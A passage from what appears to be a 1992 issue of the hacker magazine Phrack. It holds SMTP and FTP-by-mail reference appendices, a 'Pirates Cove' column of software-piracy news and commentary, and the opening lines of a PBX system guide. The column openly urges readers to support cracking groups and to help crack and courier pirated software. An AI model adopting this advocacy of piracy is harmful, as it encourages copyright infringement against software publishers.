  2162. .NZ        New Zealand      waikato.ac.nz
  2163. .PE        Peru             desco.pe
  2164. .PG        New Guinea       ee.unitech.ac.pg
  2165. .PH        Philippines
  2166. .PK        Pakistan
  2167. .PL        Poland
  2168. .PR        Puerto Rico      sun386-gauss.pr
  2169. .PT        Portugal         ptifm2.ifm.rccn.pt
  2170. .PY        Paraguay         ledip.py
  2171. .SE        Sweden           sunic.sunet.se
  2172. .SG        Singapore        nuscc.nus.sg
  2173. .TH        Thailand
  2174. .TN        Tunisia          spiky.rsinet.tn
  2175. .TR        Turkey
  2176. .TT        Trinidad & Tobago
  2177. .TW        Taiwan           twnmoe10.edu.tw
  2178. .UK        United Kingdom   ess.cs.ucl.ac.uk
  2179. .US        United States    isi.edu
  2180. .UY        Uruguay          seciu.uy
  2181. .VE        Venezuela
  2182. .ZA        South Africa     hippo.ru.ac.za
  2183. .ZW        Zimbabwe         zimbix.uz.zw
  2184.  
  2185. ===============================================================================
  2186.  
  2187. APPENDIX B:
  2188.  
  2189. Basic SMTP Commands
  2190.  
  2191. HELO <hostname>           Tells mail daemon what machine is calling.  This will
  2192.                           be determined anyway, so omission doesn't mean
  2193.                           anonymity.
  2194.  
  2195. MAIL FROM: <path>         Tells where the mail came from.
  2196.  
  2197. RCPT TO: <path>           Tells where the mail is going.
  2198.  
  2199. DATA                      Command to start transmitting message.
  2200.  
  2201. QUIT                      Quit mail daemon, disconnects socket.
  2202.  
  2203. NOOP                      No Operation -- used for delays.
  2204.  
  2205. HELP                      Gives list of commands -- sometimes disabled.
  2206.  
  2207. VRFY                      Verifies if a path is valid on that machine.
  2208.  
  2209. TICK                      Number of "ticks" from connection to present ("0001"
  2210.                           is a typical straight connection).
  2211.  
  2212. ===============================================================================
  2213.  
  2214. APPENDIX C: 
  2215.  
  2216. BIT-FTP Help File
  2217.  
  2218.    ftpmail@decwrl.dec.com (Digital FTP mail server)
  2219.  
  2220.    Commands are:
  2221.     reply <MAILADDR>              Set reply address since headers are usually
  2222.                                   wrong.
  2223.     connect [HOST [USER [PASS]]]  Defaults to gatekeeper.dec.com, anonymous.
  2224.     ascii                         Files grabbed are printable ASCII.
  2225.     binary                        Files grabbed are compressed or tar or both.
  2226.     compress                      Compress binaries using Lempel-Ziv encoding.
  2227.     compact                       Compress binaries using Huffman encoding.
  2228.     uuencode                      Binary files will be mailed in uuencoded
  2229.                                   format.
  2230.     btoa                          Binary files will be mailed in btoa format.
  2231.     ls (or dir) PLACE             Short (long) directory listing.
  2232.     get FILE                      Get a file and have it mailed to you.
  2233.     quit                          Terminate script, ignore rest of mail message
  2234.                                   (use if you have a .signature or are a
  2235.                                    VMSMAIL user).
  2236.  
  2237.    Notes:
  2238.    -> You must give a "connect" command (default host is gatekeeper.dec.com,
  2239.       default user is anonymous, default password is your mail address).
  2240.    -> Binary files will not be compressed unless "compress" or "compact"
  2241.       command is given; use this if at all possible, it helps a lot.
  2242.    -> Binary files will always be formatted into printable ASCII with "btoa" or
  2243.       "uuencode" (default is "btoa").
  2244.    -> All retrieved files will be split into 60KB chunks and mailed.
  2245.    -> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
  2246.       available, ask your LOCAL wizard about them.
  2247.    -> It will take ~1-1/2 day for a request to be processed.  Once the jobs has
  2248.       been accepted by the FTP daemon, you'll get a mail stating the fact that
  2249.       your job has been accepted and that the result will be mailed to you.
  2250. _______________________________________________________________________________
  2251.                                 ==Phrack Inc.==
  2252.  
  2253.                    Volume Four, Issue Forty-One, File 5 of 13
  2254.  
  2255.                                   Pirates Cove
  2256.  
  2257.                                    By Rambone
  2258.  
  2259.  
  2260. Welcome back to Pirates Cove.  News about software piracy, its effects, and the
  2261. efforts of the software companies to put and end to it are now at an all time
  2262. high.  Additionally, there is an added interest among the popular media towards
  2263. the other goings-on in the piracy underworld.  Additionally over the past few
  2264. months there have been several major crackdowns around the world.  Not all of
  2265. the news is terribly recent, but a lot of people probably didn't hear about it
  2266. at the time so read on and enjoy.
  2267.  
  2268. If you appreciate this column in Phrack, then also be sure to send a letter to
  2269. "phracksub@stormking.com" and let them know.  Thanks.
  2270. _______________________________________________________________________________
  2271.  
  2272.  More Than $100,000 In Illegal Software Seized
  2273.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2274. WASHINGTON -- (BUSINESS WIRE) -- Illegal software valued in excess of $100,000
  2275. was seized from an electronic bulletin board computer system (BBS)
  2276. headquartered in Baltimore, Maryland, marking the first U.S. case for the
  2277. Business Software Alliance (BSA) against a BBS for pirating software.
  2278.  
  2279. The BSA previously initiated an enforcement campaign against illegal bulletin
  2280. boards in Europe and is investigating illegal boards in Asia.  As part of the
  2281. U.S. seizure, more than $25,000 worth of hardware was confiscated in accordance
  2282. with the court order, and the BBS, known as the APL, is no longer in operation.
  2283.  
  2284. Investigations conducted over the past several months found that, through the
  2285. APL BBS, thousands of illegal copies have been made of various software
  2286. programs.  Plaintiffs in the case include six business software publishers:
  2287. ALDUS, Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.  The
  2288. action against APL was for allegedly allowing BBS users to upload and download
  2289. copyrighted programs.
  2290.  
  2291. Nearly 500 software programs were available for copying through the APL BBS, an
  2292. infringement of software publishers' copyright.  In addition, BSA seized APL's
  2293. business records which detail members' time on the BBS and programs uploaded
  2294. and/or copied.  BSA is currently reviewing these records for possible
  2295. additional legal action against system users who may have illegally uploaded or
  2296. downloaded copyrighted programs.
  2297.  
  2298. "Electronic  bulletin boards create increasingly difficult problems in our
  2299. efforts to combat piracy," according to Robert Holleyman, president of the BSA.
  2300. "While bulletin boards are useful tools to enhance communication channels, they
  2301. also provide easy access for users to illegally copy software," Holleyman
  2302. explained.
  2303.  
  2304. Strict federal regulations prohibit the reproduction of copyrighted software.
  2305. Legislation passed this year by the U.S. Congress contains provisions to
  2306. increase the penalties against copyright infringers to up to five years
  2307. imprisonment and a $250,000 fine.
  2308.  
  2309. The APL investigation, conducted by Software Security International on behalf
  2310. of the BSA, concluded with a raid by Federal Marshals on October 1, 1992.  In
  2311. addition to the six business software publishers, the BSA action was taken on
  2312. behalf of Nintendo.
  2313.  
  2314. Bulletin boards have grown in popularity over the past several years, totaling
  2315. approximately 2000 in the United States alone.  Through a modem, bulletin board
  2316. users can easily communicate with other members.  The BSA has recently stepped
  2317. up its worldwide efforts to eradicate the illegal copying of software which
  2318. occurs on some boards.
  2319.  
  2320. The BSA is an organization devoted to combating software theft. Its worldwide
  2321. campaign encompasses education, public policy, and enforcement programs in more
  2322. than 30 countries.  The members of the BSA include:  ALDUS, APPLE COMPUTER,
  2323. Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.
  2324.  
  2325. The BSA operates an Anti-piracy Hotline (800-688-2721) for callers seeking
  2326. information about software piracy or to report suspected incidents of software
  2327. theft.
  2328.  
  2329. CONTACT:  Diane Smiroldo, Business Software Alliance, (202)727-7060
  2330.  
  2331. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2332.  
  2333.  Only The Beginning
  2334.  ~~~~~~~~~~~~~~~~~~
  2335. The bust of APL BBS had made unprecedented impacts in the pirate world because
  2336. of the implications behind the actual arrest.  Business Software Alliance
  2337. (BSA), representing many major business software companies along with Nintendo,
  2338. joined forces to hit APL very hard.  They joined forces to permanently shut
  2339. down APL and are, for the first time, trying to pursue the users that had an
  2340. active role in the usage of the BBS.
  2341.  
  2342. Trying to figure out who had uploaded and downloaded files through this BBS and
  2343. taking legal recourse against them is a very strong action and has never been
  2344. done before.  One of the major problem I see with this is how do they know if
  2345. what the records show was the actual user or someone posing as another user?
  2346. Also, how could they prove that an actual program was downloaded by an actual
  2347. user and not by someone else using his account?  What if one user had logged on
  2348. one time, never called back, and someone else had hacked their account?  I'm
  2349. also sure a sysop has been known, on occasion, to "doctor" someone's account to
  2350. not allow them to download when they have been leeching.
  2351.  
  2352. The points I bring up are valid as far as I am concerned and unless the Secret
  2353. Service had logs and phone numbers of people actually logged on at the time, I
  2354. don't see how they have a case.  I'm sure they have a great case against the
  2355. sysop and will pursue the case to the highest degree of the law, but if they
  2356. attempt to arrest users, I foresee the taxpayers' money going straight down the
  2357. drain.
  2358. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2359.  
  2360.  BSA Hits Europe
  2361.  ~~~~~~~~~~~~~~~
  2362. The Business Software Alliance reached their arms out across the Atlantic and
  2363. landed in Germany.  Along with Interpol and the local police, they proceeded to
  2364. take down 80% of the boards in Berlin.  One of the contributing factors in
  2365. these busts was that the majority of the boards busted were also involved in
  2366. toll fraud.  Until recently, blue boxing was the predominate means of
  2367. communication with the United States and other countries in Europe. When most
  2368. of these sysops were arrested, they had been actively blue boxing on a regular
  2369. basis.  Unfortunately, many parts of Germany had already upgraded their phone
  2370. system, and it became very risky to use a blue box.  It didn't stop most people
  2371. and they soon became easy targets for Interpol.  The other means of LD usage
  2372. for Germans was AT&T calling cards which now are very common. The local police
  2373. along with the phone company gathered months of evidence before the city wide
  2374. sweep of arrests.
  2375.  
  2376. The busts made a bigger impact in Europe than anyone would have imagined.  Some
  2377. of the bigger boards in Europe have been taken down by the sysops and many will
  2378. never go back up.  Many sysops have been arrested and fined large amounts of
  2379. money that they will be paying off for a long time.  BSA, along with local
  2380. police and Interpol, has done enough damage in a few days that will change
  2381. European Boards for a long time.
  2382. _______________________________________________________________________________
  2383.  
  2384.  IBM:  Free Disks For The Taking
  2385.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2386. In a vain effort to increase sales, IBM decided to send out 21 high density
  2387. diskettes to anyone who called.  On these diskettes was a new beta copy of OS/2
  2388. Version 2.1.  They were hoping to take a cheap way out by sending a few out to
  2389. people who would install it and send in beta reports.  What they got was
  2390. thousands of people calling in when they heard the word who were promptly Fed
  2391. Ex'ed the disks overnight.  The beta was not the concern of most, just the
  2392. diskettes that were in the package.  The actual beta copy that was sent out was
  2393. bug ridden anyway and was not of use on most systems.
  2394.  
  2395. When IBM finally woke up and figured out what was going on, they had already
  2396. sent out thousands of copies.  Some even requested multiple copies.  IBM then
  2397. proceeded to charge for the shipment and disks, but it was way too late, and
  2398. they had gone over budget.  Way to go IBM, no wonder your stock has plummeted
  2399. to $55 a share.
  2400. _______________________________________________________________________________
  2401.  
  2402.  Users Strike Back At U.S. Robotics
  2403.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2404. Since 1987, U.S. Robotics (USR) has been a standard among sysops and many end
  2405. users.  With the loyal following also came terrible customer service and long
  2406. delays in shipments.  Their modems, being in as much demand as they are, soon
  2407. showed the results of shortcuts in the manufacture of certain parts in some of
  2408. the more popular modems.  The most infamous instance of this happening was the
  2409. Sportster model which was a V.32bis modem which could be bought at a much lower
  2410. price than that of the Dual Standard.  The catch was that they cut some corners
  2411. and used that same communication board for both the Sportster and the Dual
  2412. Standard.  They assumed they could save money by using the same board on both
  2413. modems.  Boy were they wrong.
  2414.  
  2415. All that was done to the Sportster was to disable the HST protocol that would
  2416. make it into a Dual.  With the proper init string, one could turn a Sportster,
  2417. ROM version 4.1, into a full Dual in the matter of seconds and have spent 1/3
  2418. of the price of a full Dual Standard.
  2419.  
  2420. This outraged USR when they found out.  They first denied that it could be
  2421. done.  When they found out that it had gotten too wide-spread and could not be
  2422. stopped, they then proceeded to tell the public it was a copyright infringement
  2423. to use the "bogus" init string and threatened to sue anyone who attempted to
  2424. use it.  Most people laughed at that idea and continued to use it while giving
  2425. "the bird" to USR.  Some vendors are now even trying to make a buck and sell
  2426. Sportsters at a higher price, and some are even selling them as Duals.
  2427.  
  2428. Obviously, they have now discontinued making the Sportsters the cheap way and
  2429. are now making two separate boards for both modems.  The versions with the ROM
  2430. 4.1 are still floating around, can be found almost anywhere, and will always
  2431. have the capabilities to be run as a full Dual.  Better watch out though.  The
  2432. USR police might come knocking on your door <g>.
  2433. _______________________________________________________________________________
  2434.  
  2435.  Warez Da Scene?
  2436.  ~~~~~~~~~~~~~~~
  2437. Over the last 6 months there have been several changing of hands in the major
  2438. pirate groups.  One person who supplies them has bounced to 3 groups in the
  2439. last four months.  One group fell apart because of a lack of support from the
  2440. major members, but is making a valiant comeback.  And yet another has almost
  2441. split into two like AT&T stock.  We'll have to see what comes of that.
  2442.  
  2443. While only about 15% or so actually doing anything for the scene, the other 85%
  2444. seem to complain and bitch.  Either the crack doesn't work or someone forgot to
  2445. put in the volume labels.  Jesus, how much effort does it take to say, "Hey,
  2446. thanks for putting this out, but...".  The time and effort it takes to acquire
  2447. the program, check to see if it needs to be cracked, package it, and have it
  2448. sent out to the boards is time- and money-consuming and gets very little
  2449. appreciation by the majority of the users around the world.
  2450.  
  2451. Why not see some users send in donations to the group for the appreciation it
  2452. takes to send the files out?  Why not see more users volunteer to help courier
  2453. the programs around?  Help crack them?  Make some cheats, or type of some docs? 
  2454. Be a part of the solution instead of the problem.  It would create less
  2455. headaches and gain more respect from the members who take the time and effort
  2456. to make this all possible.
  2457. _______________________________________________________________________________
  2458.  
  2459.  Review Of The Month
  2460.  ~~~~~~~~~~~~~~~~~~~
  2461. I usually type up a review of the best program I have seen since the last
  2462. issue, but since I was so disappointed with this game, I have to say something
  2463. about it.
  2464.  
  2465.  
  2466.   ___________________________________________________________________________
  2467.  |                                                                           |
  2468.  |   RELEASE INFORMATION                                                     |
  2469.  |___________________________________________________________________________|
  2470.  |                                                                           |
  2471.  | Supplied by : ACTION MAN & MUNCHIE ...................................... |
  2472.  | Cracked by  : HARD CORE ................................................. |
  2473.  | Protection  : Easy Password ............................................. |
  2474.  | Date        : 16th December 1992 (Still 14 days left!) .................. |
  2475.  | Graphics    : ALL ....................................................... |
  2476.  | Sound       : ALL ....................................................... |
  2477.  | Game Size   : 5 1.44Mb disks , Installation from floppies ............... |
  2478.  |___________________________________________________________________________|
  2479.  
  2480.  
  2481. One of the most awaited games of the year showed up at my doorstep, just
  2482. itching to be installed:  F15-]I[.  I couldn't wait to get this installed on
  2483. the hard drive and didn't care how much space it took up.  I was informed
  2484. during installation that the intro would take up over 2 megs of hard drive
  2485. space, but I didn't care.  I wanted to see it all.  Once I booted it and saw
  2486. the intro, I thought the game would be the best I had seen.  Too bad the other
  2487. 8 megs turned out to be a waste of hard drive space.
  2488.  
  2489. I started out in fast mode, getting right up in the skies.  Too bad that's the
  2490. only thing on the screen that I could recognize.  Zooming down towards the
  2491. coast, I noticed that it looked damn close to the land and, in fact, it might
  2492. as well have been.  The ocean consist of powder blue dots and had almost the
  2493. same color consistency as the land.  Not finding anything in the air to shoot
  2494. at, I proceeded to shoot a missile at anything that I thought would blow up. 
  2495. This turned out to be just about everything, including bridges.  Let a few
  2496. gunshots loose on one and see a large fireworks display like you dropped a
  2497. nuclear bomb on it.
  2498.  
  2499. Close to 3 hours later, I finally found a jet, got it into my sights and shot 3
  2500. missiles at it.   A large explosion, another one, and then he flew past me
  2501. without even a dent showing.  I shot my last 2 at it, same result.  Thus my
  2502. conclusion:  the Russians must have invincible planes.  Either that or F-15 ]I[
  2503. has some major bugs.  I'll take a wild guess and say, hmm, bugs.
  2504.  
  2505. This game is not worth the box it comes in and I would not suggest anyone,
  2506. outside of a blind person, from purchasing this.  I hate ratings but I'll give
  2507. it a 2/10.  The 2 is for modem play, which is not bad, but not good enough.
  2508. _______________________________________________________________________________
  2509.  
  2510.  Piracy's Illegal, But Not The Scourge It's Cracked Up To Be     August 9, 1992
  2511.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2512.  By T.R. Reid and Brit Hume (Chicago Tribune)(Page 7)
  2513.  
  2514. The software industry has embarked on one of its periodic public relations
  2515. campaigns to get people to believe it's being robbed blind by software pirates.
  2516. Even The New York Times took the claims seriously and ran a front-page story
  2517. illustrated by a picture of a cheerful computer hacker wearing a Hawaiian shirt
  2518. sitting in his basement surrounded by PCs and awash in piles of disks, many of
  2519. them containing bootleg programs.
  2520.  
  2521. With a straight face, the Times reported the industry's claim that in 1990, the
  2522. last year for which figures are available, programs worth $2.4 billion were
  2523. pirated, an amount equal to nearly half the industry's total sales of $5.7
  2524. billion.  In fact, the software industry has no way of knowing how much it lost
  2525. to illegal copying, but the $2.4 billion figure is almost certainly rot.
  2526. Here's why.
  2527.  
  2528. It is true that it's a snap to make an "illegal" copy of a computer program and
  2529. equally true that the practice is rampant.  You just put a disk in the drive,
  2530. issue the copy command, and the computer does the rest.
  2531.  
  2532. But there is simply no way the software industry can estimate accurately how
  2533. many illegal copies there are, and even if it could, it couldn't possibly
  2534. determine how many of them represent lost sales.  It does not follow that every
  2535. time somebody makes a bootleg copy, the industry loses a sale.  That would be
  2536. true only if the software pirate would have paid for the program had he or she
  2537. not been able to get it for free.
  2538.  
  2539. Indeed, some of those illegal copies undoubtedly lead to actual sales.  Once
  2540. users try a program, particularly a full-scale application such as a word
  2541. processor or database, and like it, they may decide they need the instruction
  2542. book and want to be able to phone for help in using the program.
  2543.  
  2544. The only way to get those things is to buy the software.  If that sounds
  2545. pie-in-the-sky, consider that an entire branch of the industry has developed
  2546. around just that process.  It's called shareware -- software that is offered
  2547. free to try.  If you like it, you are asked to buy it.  In return, you get a
  2548. bound manual and telephone support.
  2549.  
  2550. The word processor with which this column was written, PC-Write, is such a
  2551. program.  So is the telecommunications program by which it was filed, ProComm.
  2552. These programs were both developed by talented independent software developers
  2553. who took advantage of the unprecedented opportunity the personal computer
  2554. provided them.  All they needed was a PC, a desk, a text editor and a special
  2555. software tool called a "compiler."  A compiler translates computer code written
  2556. in a language such as Basic, C or Pascal into the binary code that the computer
  2557. can process.
  2558.  
  2559. Once they had written their programs, they included a set of instructions in a
  2560. text file and a message asking those who liked the software to pay a fee and
  2561. get the benefits of being a "registered" user.  They then passed out copies to
  2562. friends, uploaded them to computer bulletin boards and made them available to
  2563. software libraries.  Everyone was encouraged to use the software -- and to pass
  2564. it on.
  2565.  
  2566. The ease with which the programs can be copied was, far from a problem for
  2567. these developers, the very means of distribution.  It cost them nothing and
  2568. they stood to gain if people thought their program good enough to use.  And
  2569. gain they have.  Both PC-Write and ProComm have made a lot of money as
  2570. shareware, and advanced versions have now been released through commercial
  2571. channels.
  2572.  
  2573. The point here is not that it's okay to pirate software.  It's not, and it's
  2574. particularly dishonest to use a stolen program for commercial purposes.  The
  2575. practice of buying one copy for an entire office and having everybody copy it
  2576. and use the same manual is disgraceful.  Software may be expensive, but it's a
  2577. deductible business expense and worth the price.
  2578.  
  2579. At the same time, it's not such a bad thing to use an unauthorized copy as a
  2580. way of trying out a program before you buy it.  The shareware industry's
  2581. success has proved that can even help sales.
  2582. _______________________________________________________________________________
  2583.  
  2584.  No Hiding From The Software Police                            October 28, 1992
  2585.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2586.  By Elizabeth Weise (The Seattle Times)(Page B9)(Associated Press)
  2587.  
  2588. One call to the Piracy Hotline is all it takes for the Software Police to come
  2589. knocking at your computers.  Parametrix Inc. of Seattle found that out last
  2590. year when the Software Police, also known as the Software Publishers
  2591. Association, showed up with a search warrant and a U.S marshal to audit their
  2592. computers.  The search turned up dozens of copies of unauthorized software
  2593. programs and meant a penalty of $350,000 for Parametrix.
  2594.  
  2595. The SPA says too many companies "softlift" -- buying only one copy of a program
  2596. they need and making copies for as many computers as they have.
  2597.  
  2598. It seems so easy -- and it's just as easy to get caught.
  2599.  
  2600. "It only takes one phone call to the 800 number to get the ball rolling.
  2601. Anyone taking that chance is living on borrowed time," said Peter Beruk,
  2602. litigation manager for the Washington D.C.-based SPA.  "You can run, but you
  2603. can't hide."  And the stakes are getting higher.  A bill is before President
  2604. Bush that would elevate commercial software piracy from a misdemeanor to a
  2605. felony.  The law would impose prison terms of up to five years and fines of up
  2606. to $250,000 for anyone convicted for stealing at least 10 copies of a program,
  2607. or more than $2,500 worth of software.
  2608.  
  2609. Those in the computer industry say softlifting will be hard to prevent unless
  2610. programmers are better policed.  AutoDesk Retail Products in Kirkland has met
  2611. obstacles in educating its staff on the law.  AutoDesk makes computer-assisted
  2612. drawing programs.  "The problem is that you end up employing people who don't
  2613. want to follow convention," AutoDesk manager John Davison said.  "We hire
  2614. hackers.  To them it's not stealing, they just want to play with the programs.
  2615. "You got a computer, you got a hacker, you got a problem."  Bootlegging results
  2616. in an estimated loss of $2.4 million to U.S. software publishers each year,
  2617. Beruk said.  That's out of annual sales of between $6 billion and $7 billion.
  2618. "For every legal copy of a program sold, there's an unauthorized copy of it in
  2619. use on an everyday basis," Beruk said.  As SPA and its member companies see it,
  2620. that's theft, plain and simple.
  2621.  
  2622. SPA was founded in 1984.  One of its purposes: to enforce copyright
  2623. infringement law for software manufacturers.  Since then it has conducted 75
  2624. raids and filed about 300 lawsuits, Beruk said.  Several of the larger raids
  2625. have been in the Northwest.  The SPA settled a copyright lawsuit against
  2626. Olympia-based U.S. Intelco for $50,000 in May.  Last year, the University of
  2627. Oregon Continuation Center in Eugene, Oregon, agreed to pay $130,000 and host a
  2628. national conference on copyright law and software use as part of a negotiated
  2629. settlement with SPA.  The tip-off call often comes to SPA's toll-free Piracy
  2630. Hotline.  It's often disgruntled employees, or ex-employees, reporting that the
  2631. company is running illegal copies of software programs, Beruk said.
  2632.  
  2633. At Parametrix, an investigation backed up the initial report and SPA got a
  2634. search warrant, Beruk said.  President Wait Dalrymple said the company now does
  2635. a quarterly inventory of each computer.  The company brings in an independent
  2636. company once a year to check for unauthorized programs.
  2637.  
  2638. Softlifting, Dalrymple said, can be an easy tangle to get into.  "Our company
  2639. had had extremely rapid growth coupled with similar growth in the number of
  2640. computers we use," he said.  "We had no policy regarding the use of our
  2641. software and simply didn't control what was happening."
  2642.  
  2643. Making bootleg copies of software is copyright infringement, and it's as
  2644. illegal -- and as easy -- as copying a cassette tape or a video tape.  The
  2645. difference is in magnitude.  A cassette costs $8, a video maybe $25, while
  2646. computer programs can cost hundreds and even thousands of dollars.  Audio and
  2647. video tapes come with FBI warnings of arrest for illegal copying.  Software
  2648. comes with a notice of copyright penalties right on the box.  But despite such
  2649. threats, softlifting isn't taken seriously, said Julie Schaeffer, director of
  2650. the Washington Software Association.  "It's really in the same arena of
  2651. intellectual property," Schaeffer said.  "But people don't think about the
  2652. hours and hours of work that goes into writing a program."
  2653.  
  2654. The Boeing Co. in Seattle is one company that tries hard not to break the law.
  2655. It has a department of Software Accountability, which monitors compliance with
  2656. software licensing.
  2657.  
  2658. AutoDesk resorts to a physical inventory of the software manuals that go with a
  2659. given program.  If programmers don't have the manuals in their work cubicles,
  2660. they can be fined $50.
  2661.  
  2662. The SPA itself said the problem is more one of education than enforcement.
  2663. "Because copying software is so easy and because license agreements can be
  2664. confusing, many people don't realize they're breaking the law," the SPA said.
  2665.  
  2666. Feigning ignorance of the law doesn't help.  With Microsoft products, a user is
  2667. liable as soon as the seal on a package of software is broken.  "At that point
  2668. you've agreed to Microsoft's licensing agreement under copyright law,"
  2669. Microsoft spokeswoman Katy Erlich said.  "It says so right on the package."
  2670. _______________________________________________________________________________
  2671.  
  2672.  Teenage Pirates and the Junior Underworld                    December 11, 1992
  2673.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2674.  by Justin Keery (The Independent)(Page 31)
  2675.  
  2676.                   "By the end of the year, any schoolboy with
  2677.                     a computer who wants Sex will get it."
  2678.  
  2679. The first print-run of 100,000 copies of Madonna's Sex has sold out.  A further
  2680. 120,000 will be printed before Christmas, and bookshops have ordered every last
  2681. one.  But parents beware... around 5,000 school children have their own copy,
  2682. and the number is growing rapidly as floppy disks are circulated in
  2683. playgrounds.
  2684.  
  2685. Viewing the disk edition on a computer reveals television-quality images from
  2686. the book -- the text, it seems, is deemed superfluous.  In disk form the
  2687. pictures can be copied and traded for video games, credibility or hard cash in
  2688. a thriving underground marketplace.  By the end of the year, any schoolboy with
  2689. a computer who wants Sex will get it.  The unlucky will catch a sexually
  2690. transmitted disease in the process -- the Disaster Master virus, found on the
  2691. Independent's copy.
  2692.  
  2693. Sex is a special-interest area in the thriving junior underworld of software
  2694. trading.  Circulation of Madonna's pictures among minors with neither the
  2695. budget nor the facial hair to buy Sex gives Madonna's publishers little cause
  2696. to fear loss of sales.  Neither Secker & Warburg in London nor Time-Warner in
  2697. New York knew of the unofficial digital edition.  But the publishers of
  2698. computer video games have much to lose from playground transactions.
  2699.  
  2700. Sex is not doing a roaring trade, said one schoolboy trader.  Video games, with
  2701. price-tags of up to pounds 40, are what every child wants, but few can afford.
  2702. But who needs to buy, when your classmates will trade copies of the latest
  2703. titles for another game, a glimpse of Madonna or a humble pound coin?
  2704.  
  2705. Games disks are usually uncopyable.  Skilled programmers "crack" the
  2706. protection, as an intellectual challenge and a way of gaining respect in an
  2707. exclusive scene, add "training" options such as extra lives, and post this
  2708. version on a computer bulletin board -- a computer system attached to a
  2709. telephone line where people log in to trade their "wares".
  2710.  
  2711. Most bulletin boards (BBSs) are friendly places where computer freaks exchange
  2712. tips, messages and "public domain" programs, made available by their authors
  2713. free of charge.  But illegitimate operators, or SysOps, look down on "lame"
  2714. legal boards, and "nuke" any public domain material submitted to their systems.
  2715.  
  2716. The larger pirate boards are the headquarters of a cracking group -- often in a
  2717. 15-year-old's bedroom.  There are perhaps 100 in Britain.  Cracked games and
  2718. "demos" publicize phone numbers, and a warning is issued that copyright
  2719. software should not be posted --a disclaimer of questionable legality.  New
  2720. members are asked if they represent law enforcement agencies.  According to a
  2721. warning message on one board, at least one BBS in the United States is operated
  2722. by the FBI.
  2723.  
  2724. Your account at a board may not allow you to download until you upload wares of
  2725. sufficient quality.  Games are considered old after a week, so sexy images,
  2726. "demos" or lists of use to hackers are an alternative trading commodity.
  2727. Available this week, as well as Madonna, are: "lamer's guide to hacking PBXs",
  2728. "Tex" and "Grapevine" -- disk magazines for pirates; and demos -- displays of
  2729. graphical and sound programming prowess accompanied by bragging messages,
  2730. verbal assaults on rival factions and advertisements for BBSs.  According to a
  2731. former police officer, the recipes for LSD and high explosives have circulated
  2732. in the past.
  2733.  
  2734. The board's "download ratio" determines how many disks are traded for every
  2735. contribution -- usually two megabytes are returned for every megabyte
  2736. contributed.  "Leech accounts" (unlimited access with no quotas) are there for
  2737. those foolish enough to spend between pounds 1 and pounds 60 per month.  But
  2738. children can sign on using a pseudonym, upload a "fake" -- garbage data to
  2739. increase their credit -- then "leech" as much as possible before they get
  2740. "nuked" from the user list.
  2741.  
  2742. The "modem trader" is a nocturnal trawler of BBSs, downloading wares, then
  2743. uploading to other boards.  Current modem technology allows users to transfer
  2744. the contents of a disk in 10 minutes.  A "card supplier" can provide a stolen
  2745. US or European phone credit card number.  The scene knows no language barriers
  2746. or border checks, and international cross-fertilization adds diversity to the
  2747. software in circulation.
  2748.  
  2749. Through the unsociable insomniac trader, or the wealthier "lamer" with a paid-
  2750. up "leech account," games reach the playground.  The traders and leeches gain
  2751. extra pocket money by selling the disks for as little as pounds 1, and from
  2752. there the trade begins.
  2753.  
  2754. Some market-traders have realized the profit potential, obtaining cracked
  2755. software through leech accounts and selling the disks on stalls.  Sold at a
  2756. pocket-money price of pounds 1 per disk, many games reach schools.  The trading
  2757. of copyright software is illegal but the perpetrators stand little chance of
  2758. getting caught and are unlikely to be prosecuted.
  2759.  
  2760. The victims, software houses, suffer real damage.  Sales of Commodore Amiga
  2761. computers equal the dedicated games machines -- the Sega Megadrive or Nintendo,
  2762. yet sales of Amiga games (on disk and therefore pirate fodder) often reach only
  2763. one third of the volume of their copy-proof console cartridge counterparts.
  2764. Despite his preference for Amiga technology, Phil Thornton of System 3 Software
  2765. is "seriously reconsidering" future development of Amiga games. Myth, a two-
  2766. year project, sold pitiful amounts.  Mr. Thornton was called by a pirate the
  2767. day it was released -- the game was available on a bulletin board.  Because of
  2768. piracy, the sequel to the successful Putty will be mastered instead for the
  2769. Nintendo console.
  2770.  
  2771. This tactic may not help for long.  The cracked Amiga release of Putty carried
  2772. an advertisement (added by pirates) for a Nintendo cartridge "backup" device.
  2773. Transferred to disk, a "pirate-proof" console game can be traded like any
  2774. other.  Games for the Nintendo and Sega systems are available on most bulletin
  2775. boards.
  2776.  
  2777. Scotland Yard only takes an interest in bulletin boards bearing pornography,
  2778. though most also carry pirate software.  Funded by the software industry, the
  2779. Federation Against Software Theft has successfully prosecuted only one board,
  2780. with "more pending."
  2781.  
  2782. This Christmas parents will buy hundreds of thousands of video games.  Some
  2783. children will ask for modems; thus games will be on the bulletin boards by
  2784. Boxing Day, and the first day of term will see the heaviest trading of the
  2785. year.
  2786.  
  2787. AUTHOR'S NOTE:  I considered using a pseudonym for this article.  Two years
  2788.                 ago, a Newsweek reporter exposed the North American bulletin
  2789.                 board network.  His credit rating, social security and bank
  2790.                 files were altered in a campaign of intimidation which included
  2791.                 death threats.  Most of those responsible were 15-year-olds.
  2792. _______________________________________________________________________________
  2793.  
  2794. I was going to make a long list of greets, but there are too many people.  I
  2795. would like to say thanks again to DFX for throwing a great HoHo Con #3.  Great
  2796. job!
  2797.                                 ==Phrack Inc.==
  2798.  
  2799.                    Volume Four, Issue Forty-One, File 6 of 13
  2800.  
  2801.                    A Brief Guide to Definity G Series Systems
  2802.                                      a.k.a
  2803.                                  System 75 - 85
  2804.  
  2805.                             Written by Scott Simpson
  2806.  
  2807.  
  2808.           Greets to Jim Anderson, The Missing Link, Randy Hacker, Dark Druid,
  2809. Nickodemus, Mercury, Renegade, Infinity (enjoy the army!), Weirdo, TomCat,
  2810. GarbageHeap, Phrack Inc.
  2811.  
  2812.  
  2813. Basic History
  2814. ~~~~~~~~~~~~~
  2815. Definity model systems came into existent in the later part of the 1970s.  In
